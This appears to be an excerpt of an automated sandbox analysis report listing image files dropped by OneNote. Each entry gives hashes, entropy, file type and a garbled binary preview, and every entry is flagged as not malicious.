                                                                                                        SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14553
                                                                                                        Entropy (8bit):7.951135681293377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                        MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                        SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                        SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                        SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11332
                                                                                                        Entropy (8bit):7.9324721568775285
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                        MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                        SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                        SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                        SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22634
                                                                                                        Entropy (8bit):7.974332204835705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                        MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                        SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                        SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                        SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14177
                                                                                                        Entropy (8bit):5.705782002886174
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                        MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                        SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                        SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                        SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5465
                                                                                                        Entropy (8bit):7.79401348966645
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
                                                                                                        MD5:8470F9A96B6C6CAD9EE60961E96D19B2
                                                                                                        SHA1:AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
                                                                                                        SHA-256:2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
                                                                                                        SHA-512:CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w|.H..*.K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.|f/..+\ID.r/.o........0i..*.G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?*...I....M.0<.u....!..C..U.T.....s.Q......_..7K..*.....?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):27862
                                                                                                        Entropy (8bit):7.238903610770013
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                        MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                        SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                        SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                        SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4190
                                                                                                        Entropy (8bit):7.94161730428269
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                        MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                        SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                        SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                        SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11449
                                                                                                        Entropy (8bit):7.91552812501629
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                        MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                        SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                        SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                        SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14458
                                                                                                        Entropy (8bit):7.944094738048628
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                        MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                        SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                        SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                        SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8184
                                                                                                        Entropy (8bit):7.807848176906598
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                        MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                        SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                        SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                        SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2599
                                                                                                        Entropy (8bit):7.903700862190034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                        MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                        SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                        SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                        SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 40 x 617, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):827
                                                                                                        Entropy (8bit):7.23139555596658
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
                                                                                                        MD5:3E675D61F588462FB452342B14BCF9C0
                                                                                                        SHA1:86B62019BC3C5BE48B654256B5D10293FC8C842A
                                                                                                        SHA-256:639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
                                                                                                        SHA-512:E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.|.._...7..D..Ya.l.....{.@&.|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17289
                                                                                                        Entropy (8bit):7.962998633267186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                        MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                        SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
